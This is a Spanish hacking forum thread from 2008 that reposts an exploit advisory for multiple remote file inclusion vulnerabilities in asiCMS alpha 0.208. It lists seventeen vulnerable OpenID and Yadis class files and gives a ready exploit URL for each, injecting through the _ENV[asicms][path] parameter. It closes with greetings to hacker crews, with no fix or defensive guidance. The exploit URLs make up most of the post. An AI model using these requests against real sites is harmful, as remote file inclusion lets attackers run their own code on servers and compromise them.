Comunidad Underground Hispana  
Visita: Descargas - Foro de juegos - Articulos - Juegos Gratis - Crea tu foro gratis

Retroceder   Comunidad Underground Hispana > Phreaking, Hacking y Seguridad > Bug y Exploits > Directorio de Exploits

Respuesta Crear Nuevo Tema
 
LinkBack Herramientas Desplegado
Antiguo 09-oct-2008, 11:35   #1
BUSik49
Guest
 
Mensajes: n/a
Predeterminado asiCMS alpha 0.208 Multiple Remote File Inclusion Vulnerabilities

Código:
===========================================================================================


 [o] asiCMS alpha 0.208 Multiple Remote File Inclusion Vulnerability

    Software : asiCMS version alpha 0.208
    Vendor  : [Solo usuarios registrados pueden ver los links. ]
    Download : [Solo usuarios registrados pueden ver los links. ]
    Author  : NoGe
    Contact : noge[dot]code[at]gmail[dot]com


===========================================================================================


 [o] Vulnerable file

    classes/Auth/OpenID/Association.php
    classes/Auth/OpenID/BigMath.php
    classes/Auth/OpenID/DiffieHellman.php
    classes/Auth/OpenID/DumbStore.php
    classes/Auth/OpenID/Extension.php
    classes/Auth/OpenID/FileStore.php
    classes/Auth/OpenID/HMAC.php
    classes/Auth/OpenID/MemcachedStore.php
    classes/Auth/OpenID/Message.php
    classes/Auth/OpenID/Nonce.php
    classes/Auth/OpenID/SQLStore.php
    classes/Auth/OpenID/SReg.php
    classes/Auth/OpenID/TrustRoot.php
    classes/Auth/OpenID/URINorm.php
    classes/Auth/Yadis/XRDS.php
    classes/Auth/Yadis/XRI.php
    classes/Auth/Yadis/XRIRes.php

   All the file is affected by _ENV[asicms][path] variable



 [o] Exploit

    http://localhost/[path]/classes/Auth/OpenID/Association.php?_ENV[asicms][path]=
    http://localhost/[path]/classes/Auth/OpenID/BigMath.php?_ENV[asicms][path]=
    http://localhost/[path]/classes/Auth/OpenID/DiffieHellman.php?_ENV[asicms][path]=
    http://localhost/[path]/classes/Auth/OpenID/DumbStore.php?_ENV[asicms][path]=
    http://localhost/[path]/classes/Auth/OpenID/Extension.php?_ENV[asicms][path]=
    http://localhost/[path]/classes/Auth/OpenID/FileStore.php?_ENV[asicms][path]=
    http://localhost/[path]/classes/Auth/OpenID/HMAC.php?_ENV[asicms][path]=
    http://localhost/[path]/classes/Auth/OpenID/MemcachedStore.php?_ENV[asicms][path]=
    http://localhost/[path]/classes/Auth/OpenID/Message.php?_ENV[asicms][path]=
    http://localhost/[path]/classes/Auth/OpenID/Nonce.php?_ENV[asicms][path]=
    http://localhost/[path]/classes/Auth/OpenID/SQLStore.php?_ENV[asicms][path]=
    http://localhost/[path]/classes/Auth/OpenID/SReg.php?_ENV[asicms][path]=
    http://localhost/[path]/classes/Auth/OpenID/TrustRoot.php?_ENV[asicms][path]=
    http://localhost/[path]/classes/Auth/OpenID/URINorm.php?_ENV[asicms][path]=
    http://localhost/[path]/classes/Auth/Yadis/XRDS.php?_ENV[asicms][path]=
    http://localhost/[path]/classes/Auth/Yadis/XRI.php?_ENV[asicms][path]=
    http://localhost/[path]/classes/Auth/Yadis/XRIRes.php?_ENV[asicms][path]=


===========================================================================================


 [o] Greetz

    MainHack BrotherHood [ [Solo usuarios registrados pueden ver los links. ] ]
    VOP Crew [ Vaksin13 OoN_BoY Paman ]
    H312Y yooogy mousekill }^-^{ k1tk4t
    skulmatic olibekas ulga Cungkee str0ke

    
===========================================================================================
  Responder Citando
Respuesta

Herramientas
Desplegado

Normas de Publicación
No puedes crear nuevos temas
No puedes responder mensajes
No puedes subir archivos adjuntos
No puedes editar tus mensajes

Los Códigos BB están Activado
Las Caritas están Activado
[IMG] está Activado
El Código HTML está Desactivado
Trackbacks están Activado
Pingbacks están Activado
Refbacks están Activado



La franja horaria es GMT -5. Ahora son las 13:09.



Juegos gratis Underground Mexico Veo Descargas Songs Traducidas Videos De Musica Conservacion Tabs Metal
Noticias
 Juegos De Coche juegos gratis online juegos Utilidades Trucos
Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2010, Jelsoft Enterprises Ltd.
SEO by vBSEO 3.3.2
Traducción por vBHispano.com

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90